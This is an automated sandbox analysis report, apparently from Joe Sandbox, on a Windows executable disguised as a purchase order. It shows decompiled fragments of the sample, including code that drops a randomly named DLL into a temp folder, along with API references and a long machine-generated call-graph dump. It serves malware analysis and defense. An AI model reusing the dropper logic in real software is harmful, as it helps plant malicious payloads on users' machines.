                      				if( *_t15 == _t11) {
                      					L8:
                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                      				} else {
                      					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll", _t7, _t17 + 8, _t11);
                      					_t21 = _t5;
                      					if(_t21 == 0) {
                      						goto L8;
                      					}
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                      				return 0;
                      			}










                      APIs
                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                      Strings
                      • C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll, xrefs: 004024BC, 004024E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileWritelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll
                      • API String ID: 427699356-110904723
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004055BF(char* _a4) {
                      				char* _t3;
                      				char* _t5;
                      
                      				_t5 = _a4;
                      				_t3 =  &(_t5[lstrlenA(_t5)]);
                      				while( *_t3 != 0x5c) {
                      					_t3 = CharPrevA(_t5, _t3);
                      					if(_t3 > _t5) {
                      						continue;
                      					}
                      					break;
                      				}
                      				 *_t3 =  *_t3 & 0x00000000;
                      				return  &(_t3[1]);
                      			}






                      APIs
                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order #5000012803.exe,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 004055C5
                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order #5000012803.exe,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 004055D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharPrevlstrlen
                      • String ID: C:\Users\user\Desktop
                      • API String ID: 2709904686-224404859
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004056D1(CHAR* _a4, CHAR* _a8) {
                      				int _t10;
                      				int _t15;
                      				CHAR* _t16;
                      
                      				_t15 = lstrlenA(_a8);
                      				_t16 = _a4;
                      				while(lstrlenA(_t16) >= _t15) {
                      					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                      					_t10 = lstrcmpiA(_t16, _a8);
                      					if(_t10 == 0) {
                      						return _t16;
                      					}
                      					_t16 = CharNextA(_t16);
                      				}
                      				return 0;
                      			}







                      APIs
                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                      • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: lstrlen$CharNextlstrcmpi
                      • String ID:
                      • API String ID: 190613189-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:31.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:2.3%
                      Total number of Nodes:1846
                      Total number of Limit Nodes:92

                      Graph

4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8534 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 
8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap RtlFreeHeap 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 
8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 
9103 408946 9103->9062 9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 
9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 
404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 
9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 
10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 
10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API 
calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 
10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API 
